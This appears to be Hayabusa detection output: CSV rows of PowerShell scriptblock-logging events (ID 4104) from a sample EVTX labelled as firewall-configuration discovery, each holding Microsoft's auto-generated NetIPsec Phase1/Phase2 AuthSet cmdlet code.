$__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters 
$__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) 
$__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleMMAuthSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeRule') -and (@('ByAssociatedNetIPsecMainModeRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeRule}, 'MSFT_NetMainModeRuleMMAuthSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewPolicyStore')) { [object]$__cmdletization_value = ${NewPolicyStore} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewGPOSession')) { [object]$__cmdletization_value = ${NewGPOSession} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewGPOSession'; ParameterType = 
'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('CloneObject', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { 
$__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecPhase1AuthSet.cmdletDefinition.cdxml-Help.xml }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.957 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log," 1.0.0.0 NetIPsecPhase2AuthSet ",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.957 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 if ($(Microsoft.PowerShell.Core\Get-Command Set-StrictMode -Module Microsoft.PowerShell.Core)) { Microsoft.PowerShell.Core\Set-StrictMode -Off } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetIKEP2AuthSet' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = 'Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter' $script:PrivateData = Microsoft.PowerShell.Utility\New-Object 'System.Collections.Generic.Dictionary[string,string]' Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( 
$__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function New-NetIPsecPhase2AuthSet { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] param( [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${PolicyStore}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${GPOSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('ID')] [string] ${Name}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [string] ${DisplayName}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Description}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Group}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [ciminstance[]] ${Proposal}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${Default}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if 
($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object 'System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]' [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PolicyStore')) { [object]$__cmdletization_value = ${PolicyStore} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('GPOSession')) { [object]$__cmdletization_value = ${GPOSession} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object 
Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Name')) { [object]$__cmdletization_value = ${Name} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DisplayName')) { [object]$__cmdletization_value = ${DisplayName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = 
Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Group')) { [object]$__cmdletization_value = ${Group} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } 
$__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Proposal')) { [object]$__cmdletization_value = ${Proposal} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Default')) { [object]$__cmdletization_value = ${Default} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Default'; ParameterType = 'System.Management.Automation.SwitchParameter'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Default'; ParameterType = 'System.Management.Automation.SwitchParameter'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null 
$__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:CreateInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecPhase2AuthSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'New-NetIPsecPhase2AuthSet' function Get-NetIPsecPhase2AuthSet { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, 
[Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPs",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.957 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"ecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [int] 
${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) 
$__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleEMAuthSet', 'GroupComponent', 'PartComponent', 
'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecPhase2AuthSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetIPsecPhase2AuthSet' function Set-NetIPsecPhase2AuthSet { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByDisplayGroup', Mandatory=$true)] 
